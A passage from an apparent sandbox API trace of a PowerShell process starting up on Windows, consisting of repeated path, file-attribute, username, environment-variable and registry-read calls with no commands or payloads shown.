(uMode=0x1) returned 0x1 [0146.701] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24decc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.701] GetLastError () returned 0xcb [0146.701] SetErrorMode (uMode=0x1) returned 0x1 [0146.701] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24e34c | out: lpFileInformation=0x24e34c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6cf5da00, ftLastAccessTime.dwHighDateTime=0x1d4ae93, ftLastWriteTime.dwLowDateTime=0x6cf5da00, ftLastWriteTime.dwHighDateTime=0x1d4ae93, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0146.701] GetLastError () returned 0xcb [0146.701] SetErrorMode (uMode=0x1) returned 0x1 [0146.701] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24dee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.701] GetLastError () returned 0xcb [0146.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x24de7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.701] GetLastError () returned 0xcb [0146.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24decc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.701] GetLastError () returned 0xcb [0146.701] SetErrorMode (uMode=0x1) returned 0x1 [0146.701] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24e34c | out: lpFileInformation=0x24e34c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0146.701] GetLastError () returned 0xcb [0146.701] SetErrorMode (uMode=0x1) returned 0x1 [0146.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24decc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.701] GetLastError () returned 0xcb [0146.701] SetErrorMode (uMode=0x1) returned 0x1 [0146.701] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24e34c | out: lpFileInformation=0x24e34c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0146.701] GetLastError () returned 0xcb [0146.701] SetErrorMode (uMode=0x1) returned 0x1 [0146.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24dee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.702] GetLastError () returned 0xcb [0146.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x24de7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.702] GetLastError () returned 0xcb [0146.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.784] GetLastError () returned 0xcb [0146.784] SetErrorMode (uMode=0x1) returned 0x1 [0146.784] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2c3d080 | out: lpFileInformation=0x2c3d080*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0146.785] GetLastError () returned 0xcb [0146.785] SetErrorMode (uMode=0x1) returned 0x1 [0146.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dfe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.786] GetLastError () returned 0xcb [0146.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.786] GetLastError () returned 0xcb [0146.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.786] GetLastError () returned 0xcb [0146.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.786] GetLastError () returned 0xcb [0146.820] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338b50, nSize=0x24e538 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24e538) returned 0x1 [0146.820] GetLastError () returned 0xcb [0146.821] GetUserNameW (in: lpBuffer=0x338390, pcbBuffer=0x24e540 | out: lpBuffer="aETAdzjz", pcbBuffer=0x24e540) returned 1 [0146.822] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2c5dd80*="Available", lpRawData=0x2c5dc3c) returned 1 [0146.827] GetLastError () returned 0x0 [0146.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.828] GetLastError () returned 0xcb [0146.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.829] GetLastError () returned 0xcb [0146.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e018, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.888] GetLastError () returned 0xcb [0146.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.889] GetLastError () returned 0xcb [0146.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.889] GetLastError () returned 0xcb [0146.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dfbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.899] GetLastError () returned 0xcb [0146.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.899] GetLastError () returned 0xcb [0146.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.899] GetLastError () returned 0xcb [0146.899] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0146.900] GetLastError () returned 0xcb [0146.900] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0146.900] GetLastError () returned 0xcb [0146.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dfbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.900] GetLastError () returned 0xcb [0146.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.900] GetLastError () returned 0xcb [0146.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.900] GetLastError () returned 0xcb [0146.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dfbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.900] GetLastError () returned 0xcb [0146.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.901] GetLastError () returned 0xcb [0146.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.901] GetLastError () returned 0xcb [0146.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dfbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.901] GetLastError () returned 0xcb [0146.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.901] GetLastError () returned 0xcb [0146.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.901] GetLastError () returned 0xcb [0146.901] GetCurrentProcessId () returned 0x320 [0146.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dfbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.901] GetLastError () returned 0xcb [0146.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.901] GetLastError () returned 0xcb [0146.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.901] GetLastError () returned 0xcb [0146.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dfa8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.902] GetLastError () returned 0xcb [0146.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.902] GetLastError () returned 0xcb [0146.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.902] GetLastError () returned 0xcb [0146.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dfa8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.902] GetLastError () returned 0xcb [0146.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.903] GetLastError () returned 0xcb [0146.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.903] GetLastError () returned 0xcb [0146.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dfbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.903] GetLastError () returned 0xcb [0146.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.903] GetLastError () returned 0xcb [0146.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.903] GetLastError () returned 0xcb [0146.904] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e4cc | out: phkResult=0x24e4cc*=0x38c) returned 0x0 [0146.904] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e514, lpData=0x0, lpcbData=0x24e510*=0x0 | out: lpType=0x24e514*=0x1, lpData=0x0, lpcbData=0x24e510*=0x56) returned 0x0 [0146.904] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e514, lpData=0x338390, lpcbData=0x24e510*=0x56 | out: lpType=0x24e514*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e510*=0x56) returned 0x0 [0146.904] RegCloseKey (hKey=0x38c) returned 0x0 [0146.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dfbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.905] GetLastError () returned 0xcb [0146.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.905] GetLastError () returned 0xcb [0146.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.905] GetLastError () returned 0xcb [0146.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dfa4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.905] GetLastError () returned 0xcb [0146.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.906] GetLastError () returned 0xcb [0146.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.906] GetLastError () returned 0xcb [0147.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d634, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.059] GetLastError () returned 0xcb [0147.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.059] GetLastError () returned 0xcb [0147.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.059] GetLastError () returned 0xcb [0147.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d634, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.059] GetLastError () returned 0xcb [0147.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.059] GetLastError () returned 0xcb [0147.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.059] GetLastError () returned 0xcb [0147.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d634, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.059] GetLastError () returned 0xcb [0147.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.059] GetLastError () returned 0xcb [0147.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.060] GetLastError () returned 0xcb [0147.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d634, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.060] GetLastError 